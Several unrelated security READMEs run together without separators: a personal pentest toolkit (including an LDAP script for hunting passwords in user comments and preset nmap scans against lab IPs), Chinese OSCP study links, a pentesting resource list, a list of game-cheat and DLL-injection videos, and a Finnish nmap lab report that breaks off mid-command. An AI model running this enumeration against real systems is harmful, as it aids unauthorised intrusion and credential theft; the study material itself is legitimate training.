Dependencies: none lsc or "ls cat" will perform a ls, but include file names as a title. The purpose of this binary was I didn't like how `ls *` opened all files but it was hard to delineate between where one file started and one file ended. By default lsc will output all files recursivly in the directory its run from. If you want to filter on your search with globbing, put your search in quotes Use this tool in the following way: - Go to the directory you want to view all file contents in stdout. > lsc - or if you want to filter use > lsc "*.config" ## pulllinks Dependencies: none pulllinks is a quick way to to filter out the HTML for a page to show all links and comments found on a page. The purpose of this script was to copy the HTML source form a specific page, paste into a file (Example: index.html) then run pulllinks against it. This will show all the links for hrefs, src, onclick, and path references. I made this because I ran into a box once that had a link that was hidden. By default it does some filtering to just show the links (best effort), you can run "nofilter" as $1 and the extracted links in their entirety will be displayed. Use this tool in the following way: - Go to a web interface you want to search for links. - view the page source. - Copy all to clipboard - Paste into a file (Example: index.html) > pulllinks index.html - or to remove filtering > pulllinks index.html nofilter ## ldapgatherer Dependences: ldapsearch ldapgather will pull a bunch of ldap information from a system using ldapsearch. The purpose of this script was mainly to gather user account "comments" to see if passwords were in there. However I expanded it to do much more. Forgive how verbose the code is, I just didn't have time to clean it up. Use this tool in the following way. - To log into a ldap server with no credentials and run ldapgatherer > ldapgatherer -u '' -p '' -s 10.10.10.161 -d htb.local" or > ldapgatherer -s 10.10.10.161 -d htb.local" - If you want to use creds: > ldapgatherer -u 'domain\username' -p 'MyCoolPassword' -s 10.10.10.161 -d htb.local" ## tnas (Tmux Nmap Automation Script) Dependences: tmux, nmap tnas (pronaounced "T","NAS") utilizes tmux window panes to send your most common nmap scripts to seperate panes on the same window. tmux offers a way to send commands to seperate windows, however the syntax is long. I made this script to send the most common nmap scans I use to seperate tmux panes. That way I can monitor all of the nmap scans running at once. By default tnas has the nmap scans I used built into the end of the script, you will need to adjust accordingly if you want to use different scans. Use the tool in the following way. - Open at least 4 panes. - Perform a "CTRL+B" "Q" to identify each pane's numeric value. - Run tnas against a host ip, and specify which panes to send each command > tnas 10.10.10.10 1,2,4,5 - You will need to type in the sudo password in each pane By default tnas uses these nmap scans: `- sudo nmap -p- -sV -vv -oN _nmap_tcp_quick 10.10.10.10 `- sudo nmap -sC -sV -p- -vv -oN _nmap_tcp_full 10.10.10.10 `- sudo nmap -sU --top-ports 1000 -oN _nmap_udp_1000 10.10.10.10 `- sudo nmap -O --osscan-guess -oN _nmap_os 10.10.10.10
# Oscp公益学习组(持续更新中……) ## 一、学习组简介 希望提供建立公益学习组帮助大家汇总学习资源、分享学习经验。 官方网站 https://xuanhu.xyz ## 二、学习资源整理 [0x0000-小技巧合集.md](https://github.com/xuanhusec/OscpStudyGroup/blob/master/0x0000-%E5%B0%8F%E6%8A%80%E5%B7%A7%E5%90%88%E9%9B%86.md) [0x0001-Kali基本操作.md](https://github.com/xuanhusec/OscpStudyGroup/blob/master/0x0001-Kali%E5%9F%BA%E6%9C%AC%E6%93%8D%E4%BD%9C.md) [0x0002-常用工具.md](https://github.com/xuanhusec/OscpStudyGroup/blob/master/0x0002-%E5%B8%B8%E7%94%A8%E5%B7%A5%E5%85%B7.md) [0x0003-windows提权汇总.md](https://github.com/xuanhusec/OscpStudyGroup/blob/master/0x0003-windows%E6%8F%90%E6%9D%83%E6%B1%87%E6%80%BB.md) [0x0004-反弹shell方法汇总.md](https://github.com/xuanhusec/OscpStudyGroup/blob/master/0x0004-%E5%8F%8D%E5%BC%B9shell%E6%96%B9%E6%B3%95%E6%B1%87%E6%80%BB.md) [0x0005-靶机推荐列表.xlsx](https://github.com/xuanhusec/OscpStudyGroup/blob/master/0x0005-%E9%9D%B6%E6%9C%BA%E6%8E%A8%E8%8D%90%E5%88%97%E8%A1%A8.xlsx) [0x0006-考试报告模板.doc](https://github.com/xuanhusec/OscpStudyGroup/blob/master/0x0006-%E8%80%83%E8%AF%95%E6%8A%A5%E5%91%8A%E6%A8%A1%E6%9D%BF.doc) [0x0007-Buffer Overflow通关脚本框架.py](https://github.com/xuanhusec/OscpStudyGroup/blob/master/0x0007-Buffer%20Overflow%E9%80%9A%E5%85%B3%E8%84%9A%E6%9C%AC%E6%A1%86%E6%9E%B6.py) ## 三、其他资源参考 **0、OSCP命令大全**:https://github.com/Elinpf/OSCP-survival-guide **1、反弹shell方法汇总**:http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet **2、linux提权方法汇总** 2-1、https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ 2-1、https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist (配合linPEAS使用效果更佳) **3、windows提权方法汇总** 3-1、https://www.fuzzysecurity.com/tutorials/16.html 3-2、https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md **4、Linux提权辅助脚本** 5-1、https://www.securitysift.com/download/linuxprivchecker.py 5-2、https://github.com/diego-treitos/linux-smart-enumeration 5-3、https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS **5、Windows提权辅助脚本** 5-1、https://github.com/pentestmonkey/windows-privesc-check 5-2、https://github.com/bitsadmin/wesng 5-3、https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS **6、渗透测试方法论** 6-1、https://book.hacktricks.xyz/pentesting-methodology ## 四、OSCP自学笔记-靶机练习 这个系列中笔者将抽取10台典型靶机作为练习目标,以OSCP学习及考试的角度进行练习,并进行经验总结,不仅是靶机的writeups,同时希望能帮助备考的同学整理思路、积累经验。方便练习我会把教程和靶机打包上传网盘分享。 本系列完整教程将在知识星球“玄鹄安全-OSCP学习组”首发,欢迎各位备考同学捧场。 [1-OSCP自学笔记-October靶机练习.pdf](https://github.com/xuanhusec/OscpStudyGroup/blob/master/%E9%9D%B6%E6%9C%BA%E7%BB%83%E4%B9%A0%E7%B3%BB%E5%88%97/1-OSCP%E8%87%AA%E5%AD%A6%E7%AC%94%E8%AE%B0-October%E9%9D%B6%E6%9C%BA%E7%BB%83%E4%B9%A0.pdf) ## 五、与我交流 我的微信(微信号xuanhusec) ![wechart](img/wechart.jpg) 团队公众号(玄鹄安全) ![wechartmp](img/mp.png) 更多优质资源可加入星球学习(玄鹄安全-OSCP学习组) ![zsxq](img/xq.png)
# Penetration Testing Resources This repository has been forked from [Mia von Steinkirch](https://github.com/bt3gl). Since her repository has been archived and I intend to create one, I have forked her repository. It already has few resources available. I haven't got the time to go through all of them. I have put them in [bt3gl sub-folder](https://github.com/p1r-a-t3/Pentesting-Toolkit/tree/master/bt3gl). My resources will be available in the parent directory of the repository. Overtime, I will merge her resources with mine and make a grand one. ## Disclaimer All information and software available on this site are for educational purposes only. Use these at your own discretion, the site owners cannot be held responsible for any damages caused. The views expressed on this site are our own and do not necessarily reflect those of our employers. Usage of all tools on this site for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. We assume no liability and are not responsible for any misuse or damage caused by this site. ## Resources ### Books * [The Art of Intrusion](http://www.amazon.com/The-Art-Intrusion-Intruders-Deceivers/dp/0471782661http://www.amazon.com/The-Art-Intrusion-Intruders-Deceivers/dp/0471782661). * Krebs Series on how to be in InfoSec: [Thomas Ptacek](http://krebsonsecurity.com/2012/06/how-to-break-into-security-ptacek-edition/#more-15594), [Bruce Schneier](http://krebsonsecurity.com/2012/07/how-to-break-into-security-schneier-edition/#more-15592), [Charlie Miller](http://krebsonsecurity.com/category/how-to-break-into-security/). * [How to be a InfoSec Geek](http://www.primalsecurity.net/how-to-be-an-infosec-geek/). * [Continuous security](https://www.infoq.com/news/2019/08/continuous-security/). * [How to not get hacked](https://kubernetes.io/blog/2018/07/18/11-ways-not-to-get-hacked/). * [The Hacker Playbook](https://www.amazon.com/Hacker-Playbook-Practical-Penetration-Testing/dp/1980901759/ref=sr_1_1_sspa?dchild=1&keywords=The+Hacker+Playbook&link_code=qs&qid=1593017071&sr=8-1-spons&tag=wwwcanoniccom-20&psc=1&spLa=ZW5jcnlwdGVkUXVhbGlmaWVyPUEzN0E1VVhLQVRSSVhXJmVuY3J5cHRlZElkPUEwNjkyNTM3T0Y2SEZOSlJMVVoxJmVuY3J5cHRlZEFkSWQ9QTAzOTE5NzIyVzAwNTNNSUFLM0kzJndpZGdldE5hbWU9c3BfYXRmJmFjdGlvbj1jbGlja1JlZGlyZWN0JmRvTm90TG9nQ2xpY2s9dHJ1ZQ==) I have written a bash-script to download all the tools mentioned in this book. They are in [Hacker Playbook Utility](https://github.com/p1r-a-t3/Hacker-Playbook-Utility) repository. * [Applied Cryptography (2nd Edition) by Bruice Schneir](https://www.schneier.com/books/applied_cryptography/) * [The Code Book by Simon Singh](https://simonsingh.net/books/the-code-book/) * [The Web Application Hackers Handbook by Dafydd Stuttard and Marcus Pinto](https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470) * [Security Engineering by Ross Anderson](https://www.cl.cam.ac.uk/~rja14/book.html) * [Handbook to Applied Cryptography by Alfred J. Menezes, Paul C. van Oorschot and Scott A. Vanstone](http://cacr.uwaterloo.ca/hac/index.html) * [NGINX Admin Handbook](https://github.com/trimstray/nginx-admins-handbook#introduction) ### Video Contents ## YouTube * [Hacker101 — Newcomers Playlist](https://www.youtube.com/watch?v=zPYfT9azdK8&list=PLxhvVyxYRviZsAKXZEbmfsVMZp3s0KaVE&index=1) * [Computer Networks](https://www.youtube.com/playlist?list=PLLFIgriuZPAcCkmSTfcq7oaHcVy3rzEtc) * [Operating Systems](https://www.youtube.com/playlist?list=PLacuG5pysFbDQU8kKxbUh4K5c1iL5_k7k) * [Operating System - UC Berkley](https://www.youtube.com/watch?v=feAOZuID1HM&list=PLggtecHMfYHA7j2rF7nZFgnepu_uPuYws) * [Seytonic](https://www.youtube.com/channel/UCW6xlqxSY3gGur4PkGPEUeA/videos?view=0&sort=dd&shelf_id=1) - Youtube Channel * [YouTube Playlist on Web Challenges CTF](https://www.youtube.com/watch?v=c92Cnb9_RSc&list=PLHVYRrTI57K33009k_zat9sxF86bKU42-) * [HackerSploit Playlists](https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q/playlists) - Youtube Channel * [CTF Walkthrough on Basic Pentesting](https://www.youtube.com/watch?v=82S8wFSypB4) * [Application Security - AppSec](https://www.youtube.com/watch?v=fUDVxpOlL5Q&list=PLI9RITMnVbyiNqF0_ZOR09bzn6y83h5Pp&index=1) * [Threat Modeling Spyware - SheHacksPurple](https://www.youtube.com/watch?v=afPEZq71XdQ) * [Hacker101 Videos](https://www.hacker101.com/videos) * [LiveOverFlow Channel](https://liveoverflow.com/) * [Binary Exploitation / Memory Corruption - LiveOverFlow](https://www.youtube.com/playlist?list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN) #### Courses * [Cryptography I from Stanford](https://www.coursera.org/learn/crypto) * [Computer Forensics](https://www.edx.org/course/computer-forensics) * I bought these two courses when I was starting and looking for resources. * [Learn Ethical Hacking from Scratch by Zaid Sabih and Z Security.](https://www.udemy.com/course/learn-ethical-hacking-from-scratch/) * [The Complete Ethical Hacking Course: Beginner to Advance by Ermin Kreponic](https://www.udemy.com/course/penetration-testing/) - I bought it but never tried the course. ### CTF, Bugbounty programs, Wargames * CTF Playground * [Hacker101 CTF](https://ctf.hacker101.com/) * [picoCTF](https://picoctf.com/) * [CTF101](https://ctf101.org/) * [Embedded Security CTF](https://microcorruption.com/login) * [Google CTF](https://capturetheflag.withgoogle.com/) * Training Ground * [Zempirians Training Ground](http://training.zempirians.com/) * [Try Hack Me](https://tryhackme.com/) * [HackTheBox](https://www.hackthebox.eu/individuals) * [PentesterLab](https://pentesterlab.com/) * Binary Exploitation * [crackme.de](http://crackme.de/) * [crackmes.one](https://crackmes.one/) * Crypto Playground * [CryptoPals](https://cryptopals.com/) - Cryptography related problem. Very good for basic cryptographers. * Wargames * [OverTheWire Wargame](https://overthewire.org/wargames/) - A good starting point for beginners. * [bugcrowd university](https://www.bugcrowd.com/) * [Intigriti](https://www.intigriti.com/programs) * [VulnHub](https://www.vulnhub.com/) ### Repositories and Tools * [Programming Talks](https://github.com/hellerve/programming-talks) * [Netflix's Stethoscope](https://github.com/Netflix-Skunkworks/stethoscope) * [Ghidra](https://ghidra-sre.org/) * [Awesome Pentensting](https://github.com/enaqx/awesome-pentest) * [Repulsive Grizzly - Netflix](https://github.com/Netflix-Skunkworks/repulsive-grizzly) * [Netflix Skunkwork](https://github.com/Netflix-Skunkworks) * [Microsoft Threat Modeling Tool](https://docs.microsoft.com/en-us/azure/security/develop/threat-modeling-tool?WT.mc_id=shehackspurple-blog-tajanca) * [AssemblyLine](https://cyber.gc.ca/en/assemblyline) * [OWASP - Project Dragon Threat Modeling Tool](https://owasp.org/www-project-threat-dragon/) * [OWASP ZAP Zed Attack Proxy](https://owasp.org/www-project-zap/) * [ScriptHunter - a tool that finds javascript files for a given website](https://github.com/robre/scripthunter) * [JSMon - JavaScript Change Monitor](https://github.com/robre/jsmon) * [URL Tracker](https://github.com/ahussam/url-tracker) * [PWNMachine](https://github.com/yeswehack/pwn-machine) * [American Fuzzy Lop](https://github.com/google/AFL) * [Shodan](https://www.shodan.io/) ### Blogs/Write-ups/Plain Resources #### Security is Everybody's Job - DevSecOps SheHacksPurple blog series * [Security is Everybody's Job - Part 1 - DevSecOps ](https://www.shehackspurple.dev/members/posts/20791-security-is-everybody-s-job-part-1-devsecops) * [Security is Everybody's Job - Part 2 - What is Application Security?](https://www.shehackspurple.dev/members/posts/20877-security-is-everybody-s-job-part-2-what-is-application-security) * [Security is Everybody's Job - Part 3 - What IS DevOps?](https://www.shehackspurple.dev/members/posts/21636-security-is-everybody-s-job-part-3-what-is-devops) * [Security is Everybody's Job - Part 4 - What is DevSecOps?](https://www.shehackspurple.dev/members/posts/23749-security-is-everybody-s-job-part-4-what-is-devsecops) * [Security is Everybody's Job - Part 5 - The First Way](https://www.shehackspurple.dev/members/posts/24388-security-is-everybody-s-job-part-5-the-first-way) * [Security is Everybody's Job - Part 6 - The Second Way](https://www.shehackspurple.dev/members/posts/24389-security-is-everybody-s-job-part-6-the-second-way) * [Security is Everybody's Job - Part 7 - The Third Way](https://www.shehackspurple.dev/members/posts/24390-security-is-everybody-s-job-part-7-the-third-way) ---- #### Pushing left, Like a boss series - Tanya Janca * [Part 1 - Pushing left, Like a boss](https://code.likeagirl.io/pushing-left-like-a-boss-part-1-80f1f007da95) * [Part 2 - Security Requirements](https://code.likeagirl.io/pushing-left-like-a-boss-part-2-security-requirements-a71b86f6dd3f) * [Part 3 - Secure Design](https://code.likeagirl.io/pushing-left-like-a-boss-part-3-secure-design-16d729453afa) * [Part 4 - Secure Coding](https://code.likeagirl.io/pushing-left-like-a-boss-part-4-secure-coding-3a544dd30e20) * Part 5 - Secure Coding Guidelines * [Part 5.1 - Input Validation, Output Encoding and Parameterized Queries](https://code.likeagirl.io/pushing-left-like-a-boss-part-5-1-input-validation-output-encoding-and-parameterized-queries-ad1d4e7136c9) * [Part 5.2 - Use Safe Dependencies](https://code.likeagirl.io/pushing-left-like-a-boss-part-5-2-use-safe-dependencies-5bda811506) * [Part 5.3 - Browser and Client-Side Hardening](https://code.likeagirl.io/pushing-left-like-a-boss-part-5-3-browser-and-client-side-hardening-e7bdd6596ab3) * [Part 5.4 - Session Management](https://code.likeagirl.io/pushing-left-like-a-boss-part-5-4-session-management-ad441942511c) * [Part 5.5 - File Upload](https://code.likeagirl.io/pushing-left-like-a-boss-part-5-5-file-uploads-c2b1ee17f2d6) * [Part 5.6 - Redirects and Forwards](https://code.likeagirl.io/pushing-left-like-a-boss-part-5-6-redirects-and-forwards-3d97bf46609c) * [Part 5.7 - URL Parameters](https://code.likeagirl.io/pushing-left-like-a-boss-part-5-7-url-parameters-ac77c83b3d10) * [Part 5.8 - Securing Your Cookies](https://code.likeagirl.io/pushing-left-like-a-boss-part-5-8-securing-your-cookies-1c4391b10f88) * [Part 5.9 - Error Handling and Logging](https://code.likeagirl.io/pushing-left-like-a-boss-part-5-9-error-handling-and-logging-28e9b8267c56) * [Part 5.10 - Untrusted Data](https://code.likeagirl.io/pushing-left-like-a-boss-part-5-10-untrusted-data-786b857255e0) * [Part 5.11 - Authorization (AuthZ)](https://code.likeagirl.io/pushing-left-like-a-boss-part-5-11-authorization-authz-58d81d387536) * [Part 5.12 - Authentication (AuthN), Identity and Access Control](https://code.likeagirl.io/pushing-left-like-a-boss-part-5-12-authentication-authn-identity-and-access-control-165cd2f23110) * [Part 5.13 - HTTPS Only](https://code.likeagirl.io/pushing-left-like-a-boss-part-5-13-https-only-e4fd3b881519) * [Part 5.14 - Secure Coding Summary](https://medium.com/@shehackspurple/pushing-left-like-a-boss-part-5-14-secure-coding-summary-a9335fff2cb3) * [Part 6 - Threat Modelling](https://code.likeagirl.io/pushing-left-like-a-boss-part-6-threat-modelling-8607daf43b17) * [Part 7 - Code Review and Static Code Analysis](https://code.likeagirl.io/pushing-left-like-a-boss-part-7-code-review-and-static-code-analysis-57e3090dad28) * [Part 8 - Testing](https://code.likeagirl.io/pushing-left-like-a-boss-part-8-testing-35efda381123) * [Part 9 - An AppSec Program](https://code.likeagirl.io/pushing-left-like-a-boss-part-9-an-appsec-program-7803b1d3eb3f) * [Part 10 - Special AppSec Activities and Situations](https://code.likeagirl.io/pushing-left-like-a-boss-part-10-special-appsec-activities-and-situations-e64b4f232dfb) ---- #### Reddit * Work with encryption * [Reddit - 1](https://www.reddit.com/r/cryptography/comments/htno57/understanding_an_encrypted_text/) * [Reddit - 2](https://www.reddit.com/r/hacking/comments/htnjsp/breaking_encryption/) * [A Reddit post on How to start “hacking”](https://www.reddit.com/r/hacking/comments/a3oicn/how_to_start_hacking_the_ultimate_two_path_guide/) ---- #### Code Review * [Apples Secure Coding Guide](https://developer.apple.com/library/archive/documentation/Security/Conceptual/SecureCodingGuide/Articles/TypesSecVuln.html) * Paul Ionescu's Security Code Review * [Security Code Review 101](https://medium.com/@paul_io/security-code-review-101-a3c593dc6854) * Complete Code Review Series * [Input Validation](https://medium.com/@paul_io/security-code-review-101-input-validation-f309b1be96c7) * [Parameterized Statements](https://medium.com/@paul_io/security-code-review-101-parameterized-statements-df95c264364a) * [Memory Safe Functions and Safe Memory Management practices](https://medium.com/@paul_io/security-code-review-101-memory-adf0543926ee) * [Protecting Data - Part 1](https://medium.com/@paul_io/security-code-review-101-protecting-data-part-1-23e810277f7d) * [Protecting Data - Part 2](https://medium.com/@paul_io/security-code-review-101-protecting-personal-data-f2e891a6ff13) * [Protecting Against Cross-Site Scripting](https://medium.com/@paul_io/security-code-review-101-protecting-against-cross-site-scripting-387fb188aa2e) * [Indirect Object Reference](https://medium.com/@paul_io/security-code-review-101-indirect-object-reference-91f3ad0451c5) ---- #### Threat Modeling * [Blog post on different threat modeling method](https://insights.sei.cmu.edu/sei_blog/2018/12/threat-modeling-12-available-methods.html) * [STRIDE - Wikipedia](https://www.wikiwand.com/en/STRIDE_(security)) * [PASTA - Wikipedia](https://www.wikiwand.com/en/Threat_model#/P.A.S.T.A.) * [Threat Modeling Serverless - Tanya Janca](https://dev.to/azure/threat-modelling-serverless-500k) * [Hacking Robots and Eating Sushi](https://medium.com/bugbountywriteup/hacking-robots-and-eating-sushi-6a56b6f6a6c9) ---- #### The Open Web Application Security Project - OWASP * [OWASP Cheat Sheet Series](https://cheatsheetseries.owasp.org/Glossary.html) * [OWASP Web Security Testing Guide](https://owasp.org/www-project-web-security-testing-guide/latest/0-Foreword/README.html) * [OWASP Top Ten Web Application Security Risks](https://owasp.org/www-project-top-ten/) * [OWASP - Threat Modeling](https://owasp.org/www-community/Threat_Modeling) * [OWASP - Application Threat Modeling](https://owasp.org/www-community/Application_Threat_Modeling) * [OWASP - Threat Modeling Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Threat_Modeling_Cheat_Sheet.html) * [Real World Threat Modeling Using PASTA Methodology](https://owasp.org/www-pdf-archive/AppSecEU2012_PASTA.pdf) ---- #### CTF/Bugbounty/Wargame Walkthrough * [Trail of bits CTF guide](https://trailofbits.github.io/ctf/) * [CTF Challenges Walkthrough](https://www.hackingarticles.in/ctf-challenges-walkthrough/) * [CTF Writeup collection](https://medium.com/ctf-writeups) * [Waldo Writeup (HackTheBox)](https://medium.com/ctf-writeups/waldo-write-up-htb-dfbaaaa91282) * [Shitsco CTF Problem Walkthrough](https://medium.com/@georgiaweidman/shitsco-ctf-problem-walkthrough-6c6ae4f57599) * [0xdf hacks stuff](https://0xdf.gitlab.io/) * [Union SQLi Challenges (Zixem Write-up)](https://medium.com/ctf-writeups/union-sqli-challenges-zixem-write-up-4e74ad4e88b4) * [Google’s Project Zero](https://googleprojectzero.blogspot.com/) ---- #### Others * [MITRE Top 25 Dangerous Security Flaws](https://cwe.mitre.org/top25/archive/2019/2019_cwe_top25.html) * [zSecurity blog](https://zsecurity.org/) * [Malware Must Die](https://www.malwaremustdie.org/) * [Netflix Tech Blog](https://netflixtechblog.com/) * [Session Fixation Attack](https://www.wikiwand.com/en/Session_fixation) * [RIPS Tech Security Talks](https://www.ripstech.com/research/talks/) * [CyberSec Lounge](http://cybersec-lounge.com/) * [Getting Started with Bug Bounty](https://medium.com/@cablej/getting-started-in-bug-bounties-9990fae0e8e8) * [Prototype iPhone Hackers Use to Research Apple’s Most Sensitive Code](https://www.vice.com/en_us/article/gyakgw/the-prototype-dev-fused-iphones-that-hackers-use-to-research-apple-zero-days)
# [国外教程] 作者 : Guided Hacking 平台 : YouTube 语言 : C++ 说明 : 实在太多视频了,你们自己去这大佬主页找吧 教程 : :smile: ## 其它 [How to solve Pride #1 CrackMe Tutorial - Beginner Level](https://youtu.be/H71G8ZRjWek) [HackTheBox Irked Walkthrough - UnrealIRCd Exploit](https://youtu.be/bab2t0QkZd8) [How to Unpack Malware, How to use Imprec, How to find OEP](https://youtu.be/Er0_FkLUk3U) [How to Hack Gwent - Witcher 3 Cheat Engine Tutorial](https://youtu.be/9mGdPevwwXw) [Practical Reverse Engineering 2 - Pg 35 Exercise 1 Sample J](https://youtu.be/5_LHA3sl7-4) [How to Hack MineSweeper x32dbg Reversing Tutorial](https://youtu.be/ixB7iaea4l0) [Practical Malware Analysis Walkthrough - Chapter 1 Labs](https://youtu.be/lwUve1VdFYs) [Kernel 2 - Usermode Communication - IOCTL Tutorial](https://youtu.be/eumG222Efzs) [HackTheBox Giddy Walkthrough Tutorial - Unifi Video Exploit](https://youtu.be/phgxctCHyHw) [Practical Reverse Engineering Exercise 1 Solution Page 11](https://youtu.be/1zY7lbcbBZQ) [HackTheBox Blue Walkthrough Eternal Blue Exploit MS17-010](https://youtu.be/sx9daqxvrrA) [Simple Wordpress Web Shell Tutorial](https://youtu.be/XHShse4z6ds) ## OpenGL [C++ Internal Trampoline Hook Tutorial - OpenGL Hook](https://youtu.be/HLh_9qOkzy0) [How to make an OpenGL ESP Tutorial](https://youtu.be/kGDKQXgxIrY) [OpenGL Hook - SwapBuffers Hook Tutorial - Drawing & Text 1/2](https://youtu.be/dEgva5-OsSY) [OpenGL Hook - SwapBuffers Hook Tutorial - Drawing & Text 2/2](https://youtu.be/6JV0dmLWMNs) ## CS420 [CS420 - 1 Game Hacking Course Introduction](https://youtu.be/hj4rhfnikVs) [CS420 - 2 Memory Editing 1 - Game Hacking Course](https://youtu.be/xOBE_vWDX_I) [CS420 - 3 Base Systems - Hex, Decimal & Binary](https://youtu.be/nA7o5kmH6wg) [CS420 - 4 - How to Hex Edit Games - Game Hacking Course](https://youtu.be/EpcK8uk7lcY) [CS420 - 5 - Memory Editing & Data Types - Game Hacking Course](https://youtu.be/6KNNRqjpgGE) [CS420 6 - What is Virtual Memory ? Full Course](https://youtu.be/aPNcEckD1Qk) [CS420 7 - Virtual Memory & Multilevel Pointers Tutorial](https://youtu.be/_W0xdVO8-j4) ## Cheat Engine [Cheat Engine Tutorial Guide 1/3 Steps 1-5](https://youtu.be/Nib69uZJCaA) [Cheat Engine Tutorial Guide 2/3 Steps 6-9 Pointers and Code Injection](https://youtu.be/yjdSxL2DWfE) [Cheat Engine Tutorial Guide 3/3 Tutorial Games](https://youtu.be/H9_0exi5tCU) [How To Find Offsets, Entity Addresses & Pointers](https://youtu.be/YaFlh2pIKAg) [Cheat Engine How to Pointer Scan with Pointermaps](https://youtu.be/nQ2F2iW80Fk) [How to Hack Any Game C++ External Trainer Assault Cube 1/2](https://youtu.be/wiX5LmdD5yk) [How to Hack Any Game C++ External Trainer Assault Cube 2/2](https://youtu.be/UMt1daXknes) ## Tibia [OllyDBG Tibia Reverse Engineering & Function Calling Tutorial 1/3](https://youtu.be/zldW5gBc-JE) [How to make a Tibia Bot - MMO Botting Tutorial by Petko123 3/3](https://youtu.be/cp7DW6-mKc4) [Reverse Engineering Tibia Packet Function - x64dbg Tutorial 2/3](https://youtu.be/wVhuhYiA8-8) ## CSGO [How To Find CSGO NetVar Offsets Tutorial with IDA Pro](https://youtu.be/QdG9-jxOf8Y) [CSGO How to find m_bDormant offset tutorial bDormant](https://youtu.be/YCv3sqcPb6E) [Cody's C++ CSGO Bunnyhop Tutorial Part1 External](https://youtu.be/jO5GUhwd86U) [Cody's C++ CSGO Bunnyhop Tutorial Part2 Internal](https://youtu.be/fxqa5pBvnIU) [Cody CSGO Triggerbot Tutorial External Pt1](https://youtu.be/zEK1mF-DcWk) [Cody's CSGO Triggerbot Tutorial External Pt2](https://youtu.be/3eNNQD8c1W8) [How to Hack CSGO - CSGO Triggerbot Tutorial External Part3](https://youtu.be/XaOwqvEdK6Y) [How to Hack CSGO - C++ External CSGO Anti Flash Tutorial](https://youtu.be/PWhv0C0jD2k) [Cody's External C++ CSGO GlowHack Tutorial](https://youtu.be/jutZzuvX8Qs) [Cody's External C++ CSGO GlowHack Tutorial Pt.2](https://youtu.be/UWt3KMRXtEg) [Cody's External C++ CSGO Glow Tutorial Pt.3](https://youtu.be/SrzFQ_ab8ug) [C++ CSGO External bSpotted Hack - 2D Radar Tutorial](https://youtu.be/5VOkRJk1GVg) [D3D9 CSGO ESP Tutorial 1 - EndScene Hook Tutorial - esp1z1](https://youtu.be/7QDkceeykbI) [D3D9 CSGO ESP Tutorial 2 - EntityList & Snap Line ESP Tutorial](https://youtu.be/jnUZT2gWWuE) [D3D9 CSGO ESP Tutorial 3 - ESP Boxes, Health Bars & Recoil Crosshair](https://youtu.be/FXRXL7lQLTg) [D3D9 CSGO ESP Tutorial 4 - 3D Box ESP, Health & More](https://youtu.be/uwyNvHdLOmo) [D3D9 CSGO ESP Tutorial 5 - Direct3D Menu & More](https://youtu.be/FjRhxSiWA_Q) [CSGO Netvar Manager Tutorial - How to get Netvar offsets](https://youtu.be/hBA-_aAETX4) [CSGO CreateInterface - How to get Interfaces - GetInterface](https://youtu.be/HHHlNdmzYqA) [CSGO How to Call TraceRay - IEngineTrace Interface Tutorial](https://youtu.be/sv79Mgt_FmY) [CSGO How to Find TraceRay / TraceLine - Reversing Tutorial](https://youtu.be/hZQzJkzmPG4) [dwForceJump Bitfields & BitFlags - CSGO BunnyHop Tutorial - Explained](https://youtu.be/igtUR9on0NE) [C++ CSGO RCS Hack - Recoil Control System Tutorial - Quick & EZ](https://youtu.be/i99MqX5BjlI) [How to Find the ViewMatrix Offset CSGO](https://youtu.be/crT9zGviqVs) [CSGO Aimbot Tutorial & CalcAngle Explained](https://youtu.be/sDd8aBCCBbA) [How to Find and Reverse the CSGO EntityList with ReClass.NET](https://youtu.be/oXlOboQURy0) ## 上古卷轴5 [C++ Skyrim Mods Part1: Introduction & Overlay](https://youtu.be/i8Cn7fydNUA) [C++ Skyrim Mods Part2: How to Find Entitylist & Hooking](https://youtu.be/aYN7IjGubuY) [C++ Skyrim Mods Part3: Writing the ESP](https://youtu.be/jOwTVLqaEsw) [C++ Skyrim Hacks Part4: NoClip Hack Tutorial Part 1](https://youtu.be/-ZJyAWDQXzM) [C++ Skyrim Mods Part5: NoClip Part 2](https://youtu.be/W0IgSTlGJTY) [C++ Skyrim Mods Part6: Map Teleport & ASM](https://youtu.be/NzyFl4_LM3M) [C++ Skyrim Mods Part 7: Find Bones & Write ESP](https://youtu.be/JtWPpbLAh8Q) ## DLL注入 [Manual Mapping DLL Injection Tutorial - How to Manual Map 1of4](https://youtu.be/qzZTXcBu3cE) [Manual Mapping DLL Injection Tutorial 2of4](https://youtu.be/EXRm7tCOwGg) [Manual Mapping DLL Injection Tutorial 3of4](https://youtu.be/c8B--5lKbNg) [Manual Mapping DLL Injection Tutorial 4of4](https://youtu.be/_7SvkCGE67M)
# Porttiskannausta ja muuta tiedustelua Tehtäväksi annettiin käydä lävitse useita nmap -ohjelman/komennon toimintoja, ja analysoida niitä. Tätä varten käytin aikaisemmille tehtäville pystyyn pistettyä metasploitable -maalikonetta, ja Kali Linux virtuaalikonetta itse skannausten ja pakettikaappausten tekemiseen Wiresharkin avulla.. Molemmat virtuaalikoneet olivat irroitettu julkisesta verkosta, ja niillä oli yhteys ainoastaan toisiinsa niiden paikallisessa virtualisoidusa verkossa. ### nmap TCP Connect Scan (-sT) Aloitettiin ensin TCP Connect Scan:llä, eli nmap -komennolla -sT parametrin kanssa. [Nmap Reference Guide](https://nmap.org/book/scan-methods-connect-scan.html) kertoo tämän skannaustyypin olevan oletus-skannaustyyppi, jos SYN-skannausta ei voi käyttää koska käyttäjällä ei ole raakapakettien kirjoittamiseen oikeutta, tai käyttäjä skannaa IPv6 -verkkoja. Tämä skannaus siis yrittää luoda yhteyksiä useisiin portteihin sen sijaan, että se lähettäisi niihin raakoja paketteja. Reference guide varoittaa myös, että SYN-skannaus olisi parempi vaihtoehtona ei pelkästään sen takia, että se ei ole yhtä tehokas, vaan että siitä jää myös enemmän todistusaineistoia, koska Connect Scan vie yhteydenluonnin loppuun asti. Ajoin Kali-koneella komennon ``sudo nmap -sT 